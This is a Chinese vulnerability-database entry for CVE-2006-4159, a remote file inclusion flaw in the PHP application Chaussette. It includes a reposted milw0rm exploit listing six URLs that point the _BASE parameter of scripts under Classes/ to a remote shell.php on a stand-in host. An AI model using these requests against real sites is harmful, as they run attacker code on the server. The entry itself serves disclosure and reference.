Chaussette多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110800 漏洞类型 代码注入
发布时间 2006-08-10 更新时间 2006-09-05
CVE编号 CVE-2006-4159 CNNVD-ID CNNVD-200608-273
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-273
|漏洞详情
Chaussette080706及早期版本中存在多个PHP远程文件包含漏洞,远程攻击者可借助Classes/下脚本的_BASE参数中的URL执行任意PHP代码,具体脚本包括:(1)Evenement.php,(2)Event.php,(3)Event_for_month.php,(4)Event_for_week.php,(5)My_Log.php,(6)My_Smarty.php,可能还包括(7)Event_for_month_per_day.php脚本。
|漏洞EXP
Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip

Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem Is :
$_BASE Not Declare;


ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php

Greatz: Str0ke

# milw0rm.com [2006-08-10]
|参考资料

来源:BID
名称:19480
链接:http://www.securityfocus.com/bid/19480
来源:OSVDB
名称:27902
链接:http://www.osvdb.org/27902
来源:OSVDB
名称:27901
链接:http://www.osvdb.org/27901
来源:OSVDB
名称:27900
链接:http://www.osvdb.org/27900
来源:OSVDB
名称:27899
链接:http://www.osvdb.org/27899
来源:OSVDB
名称:27898
链接:http://www.osvdb.org/27898
来源:OSVDB
名称:27897
链接:http://www.osvdb.org/27897
来源:VUPEN
名称:ADV-2006-3269
链接:http://www.frsirt.com/english/advisories/2006/3269
来源:SECUNIA
名称:21489
链接:http://secunia.com/advisories/21489
来源:MILW0RM
名称:2169
链接:http://milw0rm.com/exploits/2169
来源:XF
名称:chaussette-base-file-include(28327)
链接:http://xforce.iss.net/xforce/xfdb/28327